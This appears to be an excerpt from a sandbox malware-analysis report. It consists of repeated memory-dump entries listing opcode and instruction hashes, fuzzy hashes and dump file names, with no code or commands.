                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aafa9e034280b6a3b04642c751ffc15dee64f6dfea05f662633ed96f85304342
                                                                                        • Instruction ID: 8ca5b575e40a9ae72e53fd1a863a4b868c2e8b066a1e49be950b1851c57b1684
                                                                                        • Opcode Fuzzy Hash: aafa9e034280b6a3b04642c751ffc15dee64f6dfea05f662633ed96f85304342
                                                                                        • Instruction Fuzzy Hash: 2771B530E1E64E8EEB69DBB488A46BD7BB0FF45340F5104BAE01ED71E6DE3869418711
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f9974ff7fd41f1b64845e9a40bc194c4b28d6f4dadacb0c8e18e7fee342a096c
                                                                                        • Instruction ID: 36737c97d8bc2674140364a063d083a6de2120962cd92797a1ba0b9568e0d6ac
                                                                                        • Opcode Fuzzy Hash: f9974ff7fd41f1b64845e9a40bc194c4b28d6f4dadacb0c8e18e7fee342a096c
                                                                                        • Instruction Fuzzy Hash: FC51FA3170E54E8FE778DA6888669BD77C1FF55320B0602B9D05EC76B2DD18A9068782
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a9c0d4b39d09b694adbf535b176df5974f63f36e65d78cb5905fd1731eaad78
                                                                                        • Instruction ID: 6b895cc4b3ad04cfd33e6f93ecf3e1e89f1d85119efea8526d75807ccc00636a
                                                                                        • Opcode Fuzzy Hash: 6a9c0d4b39d09b694adbf535b176df5974f63f36e65d78cb5905fd1731eaad78
                                                                                        • Instruction Fuzzy Hash: E2714730A0EA4A8FE759DB75C0E05A8BBA0FF15300F4541B9D04ECBAE7DB28B951C791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c0bda10c1b44f0d0b16857cad3d2fc8be1aa45013da7a9496735cca9e8ee2980
                                                                                        • Instruction ID: 8f9451f3df743190d80d96d7b1e875bab296e51160da5f832c1957db72b99f66
                                                                                        • Opcode Fuzzy Hash: c0bda10c1b44f0d0b16857cad3d2fc8be1aa45013da7a9496735cca9e8ee2980
                                                                                        • Instruction Fuzzy Hash: CE11E53190D7CA5FE713ABB888650987FB0EF47251F0944EBD498C72A3EA385948C751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab5000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d4248fd48f2a1a3eb1d1d7e28a0823f32e6f8cfedd726cf8d5b0a9ca03a474e8
                                                                                        • Instruction ID: 63c511ea64f45681b3eb6e95e4b1f5f841633bc726e4e53723b71213444c6725
                                                                                        • Opcode Fuzzy Hash: d4248fd48f2a1a3eb1d1d7e28a0823f32e6f8cfedd726cf8d5b0a9ca03a474e8
                                                                                        • Instruction Fuzzy Hash: AB31843160D9498FDB5CEF29C4A5EA4B7E1FF6932070446AEE05AC7293DE21E840CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c04914f0a91e699fbc56ba0a8dcfb5ecefbf6d1c5ab79371069420c5bf7e239f
                                                                                        • Instruction ID: 5285208edfac6c446ae86e856c72b64bbfd1b8770f307388c3189d180b561e22
                                                                                        • Opcode Fuzzy Hash: c04914f0a91e699fbc56ba0a8dcfb5ecefbf6d1c5ab79371069420c5bf7e239f
                                                                                        • Instruction Fuzzy Hash: 4231623160C9488FDB59EF2CC4A5D64B7E2FFA9711B0406AAE05EC7292DE25EC41CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ab7c4af313b1feb71e20c821b67c4ae7c92d5fbb8d614d1dd6d4c2527322666
                                                                                        • Instruction ID: a0c898f13e5284ba3912a59dc0d25d6ff8c07e86da71116d48bb09bb40ed19c3
                                                                                        • Opcode Fuzzy Hash: 4ab7c4af313b1feb71e20c821b67c4ae7c92d5fbb8d614d1dd6d4c2527322666
                                                                                        • Instruction Fuzzy Hash: 7431933260C9498FDB5CEF28C4A5E6473E1FFA836470406AED04AC7292DE24F885CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 46ce7782386b03417b6bdae30a7add84728cd8162ac67611ebd415558b8e99c5
                                                                                        • Instruction ID: f7318829ed910da267f9439b038cafbe43c71742981ad46639decc451248ac0b
                                                                                        • Opcode Fuzzy Hash: 46ce7782386b03417b6bdae30a7add84728cd8162ac67611ebd415558b8e99c5
                                                                                        • Instruction Fuzzy Hash: 8331727160C9488FDB98EB2CC4A5E6577E1FF69324B0406AEE45EC7292DE30E845CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9a3b48c4e4a4510fb3512838e941f70a0aa02765d9b7f3025c45cfb4c70c948b
                                                                                        • Instruction ID: cee340a9454140a7cc4b31dcd6f17231ad812d383fa1b87a70520c7de30ec0df
                                                                                        • Opcode Fuzzy Hash: 9a3b48c4e4a4510fb3512838e941f70a0aa02765d9b7f3025c45cfb4c70c948b
                                                                                        • Instruction Fuzzy Hash: 3231973160D9098FDF58EF29C4A5EA4B3E1FF6931070446AEE05AC7292DE31E941CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 06d0c1373858466efb2562b4334fad119eaac902b798dacb8b7358e40012df43
                                                                                        • Instruction ID: acab925adc9ca7fc875faa8f9c8c934e22d7f7814beec32a9ce0dd41279b9396
                                                                                        • Opcode Fuzzy Hash: 06d0c1373858466efb2562b4334fad119eaac902b798dacb8b7358e40012df43
                                                                                        • Instruction Fuzzy Hash: 0831413160D9498FDB98EF28C4A5DA873E1FFA8310B1405ADD04EC7596DE35F885CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 35277a06a4eb42a9e24f3db2f179713f0d5e81738b42f0a10f5e619b1628ade4
                                                                                        • Instruction ID: 84f39bb382d844ce8beb86e27488de689f7ef1f38452df354a58862dd1549793
                                                                                        • Opcode Fuzzy Hash: 35277a06a4eb42a9e24f3db2f179713f0d5e81738b42f0a10f5e619b1628ade4
                                                                                        • Instruction Fuzzy Hash: 5C31533170C9098FDF58EF28C4A5D64B3E2FFA8711B0406AAE05EC7292DE35E841CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3dd543517a6ea9d465665c6903afc8554e670f7ece4fc4b29af46c46dad3ea15
                                                                                        • Instruction ID: 985220e413358ede1d7ba4697de75ad345b580d74b204b9e82d721e6c333a2b5
                                                                                        • Opcode Fuzzy Hash: 3dd543517a6ea9d465665c6903afc8554e670f7ece4fc4b29af46c46dad3ea15
                                                                                        • Instruction Fuzzy Hash: FD31463160D9498FDF5CEF28C465E6577E1FFA836470406AED04AC7292DE24F885CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7909718a51595d9618701c14b7b66a2317e0b93cb36bf8cce6cdf391900852e5
                                                                                        • Instruction ID: aaae9aa2a8ff1ecc20c12b7b7929cef370b0b3eaeaa404d5ffae7732bd2927d6
                                                                                        • Opcode Fuzzy Hash: 7909718a51595d9618701c14b7b66a2317e0b93cb36bf8cce6cdf391900852e5
                                                                                        • Instruction Fuzzy Hash: 64310571A0F28E8BF33996B448B55BD3B50EF42360F1601BAF49EC70E2DD193A458392
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baa0000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 93ff0390e7a6512369223603b6b97fc13a8bf3e5985aa8a640dde8b19741cb23
                                                                                        • Instruction ID: 0f6226f7e385c64d35618c4da4ce5527f566432ad7d795f674c0d79219214b3a
                                                                                        • Opcode Fuzzy Hash: 93ff0390e7a6512369223603b6b97fc13a8bf3e5985aa8a640dde8b19741cb23
                                                                                        • Instruction Fuzzy Hash: 8C4199B0E1951E8FEBB5DB68C8647B8B6F5BB54300F1151FAD00DA22A1DE786B849F10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ad8014d953feaaebbfaa50324b71890d6e2b395cc1b129197d815a949b52314c
                                                                                        • Instruction ID: 4a1963477b7b64ccdba522659ccd6f09a515ab43f698e53b085af4df6dc54422
                                                                                        • Opcode Fuzzy Hash: ad8014d953feaaebbfaa50324b71890d6e2b395cc1b129197d815a949b52314c
                                                                                        • Instruction Fuzzy Hash: C9314E71B1990E9FDB58DE68D4A19ACF7E2FF94310B51413AD05ED3692CF24B852CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 19d8300aa6cbb04af242881c8fce6a004e74a9e179b09f47a64c54b4b3abe8d9
                                                                                        • Instruction ID: 3ab64ce015b1b5849b9eddf8adf89778ef3e83a139892d40f2dbd1cba1ed9671
                                                                                        • Opcode Fuzzy Hash: 19d8300aa6cbb04af242881c8fce6a004e74a9e179b09f47a64c54b4b3abe8d9
                                                                                        • Instruction Fuzzy Hash: FD31D331E0E68E9FEB65DBA8C8715ED7BB0FF19310F1901BAD00AD72A2CE246904C704
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e36207d1e736302ed322de0b3e73002c7a011eab9c12c90d70bb23a5e5476c5
                                                                                        • Instruction ID: 7ae71fc89d53bebf56633f5e0708453d34a1aa0697535301a7de3c8e7519f677
                                                                                        • Opcode Fuzzy Hash: 6e36207d1e736302ed322de0b3e73002c7a011eab9c12c90d70bb23a5e5476c5
                                                                                        • Instruction Fuzzy Hash: 31313472F1E64E4FFB68A7A848722ACB7D1EF45390F15027AD05DD72D6DE2869058280
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 001eff121877155ce5372c7c2a3bad1c5c796069953df3219885eec485c1866f
                                                                                        • Instruction ID: c32f0ab87fcfbb81a3ea57e6cf014c59249bc68bbd96dfe6a5308a5e3a20104b
                                                                                        • Opcode Fuzzy Hash: 001eff121877155ce5372c7c2a3bad1c5c796069953df3219885eec485c1866f
                                                                                        • Instruction Fuzzy Hash: 12310721B0F6CE4AF77256B82C3C1BD2F94EF46250F0A01B6D49DCA2A7E9485A05C352
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc91000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e0b8380ee65e928eb40c3286755b5c8acbee604444213eaff9cc9924c2bcfb53
                                                                                        • Instruction ID: 5245d3e340c28844284898834b5929a868a380104e88c8120d1df64306600387
                                                                                        • Opcode Fuzzy Hash: e0b8380ee65e928eb40c3286755b5c8acbee604444213eaff9cc9924c2bcfb53
                                                                                        • Instruction Fuzzy Hash: 01314171B1990A9FEB68DAA8D4A15ACB3A1FF99311B154139D00ED32A6CF347D11C780
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc6f000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d7a8fac5bfbbe48f2c25b0a5795e8b2d9b1e79fc8ff47c0cf0d3a1705ab9ca65
                                                                                        • Instruction ID: 49927c9895dea64210d16b88754eadf5c5df0485e6284c0349dceacdbc2ec4bb
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 44bb601510cb1bd4a0f1e6ff51d30390b796b0ffa48af30876a589023ed621b0
                                                                                        • Instruction ID: 7b6a3f83be9fefc013a4c913dd49091c355a7e14cb81ee135448a787dd00a4cc
                                                                                        • Opcode Fuzzy Hash: 44bb601510cb1bd4a0f1e6ff51d30390b796b0ffa48af30876a589023ed621b0
                                                                                        • Instruction Fuzzy Hash: 50210F71E0991D9FDF98DB68C465AEDB7B1FF58310F0002AED14EE3291CA75AA41CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC6F000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
